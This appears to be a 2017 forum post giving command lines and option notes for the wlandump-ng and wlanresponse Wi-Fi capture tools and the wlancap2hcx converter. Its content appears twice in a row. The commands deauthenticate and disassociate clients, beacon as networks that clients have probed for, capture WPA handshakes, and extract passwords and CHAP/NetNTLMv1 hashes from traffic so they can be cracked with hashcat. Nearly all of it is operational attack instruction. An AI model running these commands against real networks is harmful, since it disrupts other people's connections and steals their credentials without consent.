06-26-2017, 09:40 PM
capture:
sudo wlandump-ng -i wlp0s26u1u2 -o test.cap -c 1 -t 3 -d 100 -D 10 -m 512 -b -r -s 20
Options:
-i -> is the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-c -> start on channel 1
-t -> stay 3 seconds on this channel
-d -> deauthenticate clients every 100 received management-packets
(do not use values below this, because this will ap change the anonce lease time - important for hashcat nonce-corr)
-D -> disassociate clients every 10 received (NULL-, Powersave-, M4- packets)
(do not use values below this, because this will ap change the anonce lease time - important for hashcat nonce-corr)
-m -> size of internal ringbuffer (if more received, the oldest will be deleted)
-b -> activate beaconing on last ten probed clients
-r -> reset counter if channel 1 reached
-s -> show 20 additional status lines
wlanresponse is the "angry" brother of wlandump-ng !
sudo wlanresponse -b -t 3 -i wlp0s26u1u2 -o test.cap
-i -> is the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-b -> activate beaconing on last ten probed clients
-t -> stay 3 seconds on this channel
less options, no status display, but extreme fast!
convert:
wlancap2hcx -x -e wordlist -o test.hccapx *.cap
Options:
-x -> match exact mac_ap and mac_sta
-e -> extract also found passwords and networknames from wlan traffic (will be appended)
-o -> your hccapx file (new hashes will be appended)
*.cap -> do this from all cap files (or *.pcap from all pcap files or *.pcapng from all pcapng files)
if RADIUS authentications are inside your cap:
-m -> strip this hashes to file - iSCSI CHAP authentication, MD5(CHAP): use hashcat -m 4800
-n -> strip this hashes to file - PPP-CHAP and NetNTLMv1 authentication: use hashcat -m 5500
-u -> extract also user names, domain names or identities
Take a look into the help for more options
I will not give tutorials how to set device to monitor mode or how to disable systemd services that takes access to wlan devices - that's LINUX basic knowledge!
Cheers
sudo wlandump-ng -i wlp0s26u1u2 -o test.cap -c 1 -t 3 -d 100 -D 10 -m 512 -b -r -s 20
Options:
-i -> is the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-c -> start on channel 1
-t -> stay 3 seconds on this channel
-d -> deauthenticate clients every 100 received management-packets
(do not use values below this, because this will ap change the anonce lease time - important for hashcat nonce-corr)
-D -> disassociate clients every 10 received (NULL-, Powersave-, M4- packets)
(do not use values below this, because this will ap change the anonce lease time - important for hashcat nonce-corr)
-m -> size of internal ringbuffer (if more received, the oldest will be deleted)
-b -> activate beaconing on last ten probed clients
-r -> reset counter if channel 1 reached
-s -> show 20 additional status lines
wlanresponse is the "angry" brother of wlandump-ng !
sudo wlanresponse -b -t 3 -i wlp0s26u1u2 -o test.cap
-i -> is the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-b -> activate beaconing on last ten probed clients
-t -> stay 3 seconds on this channel
less options, no status display, but extreme fast!
convert:
wlancap2hcx -x -e wordlist -o test.hccapx *.cap
Options:
-x -> match exact mac_ap and mac_sta
-e -> extract also found passwords and networknames from wlan traffic (will be appended)
-o -> your hccapx file (new hashes will be appended)
*.cap -> do this from all cap files (or *.pcap from all pcap files or *.pcapng from all pcapng files)
if RADIUS authentications are inside your cap:
-m -> strip this hashes to file - iSCSI CHAP authentication, MD5(CHAP): use hashcat -m 4800
-n -> strip this hashes to file - PPP-CHAP and NetNTLMv1 authentication: use hashcat -m 5500
-u -> extract also user names, domain names or identities
Take a look into the help for more options
I will not give tutorials how to set device to monitor mode or how to disable systemd services that takes access to wlan devices - that's LINUX basic knowledge!
Cheers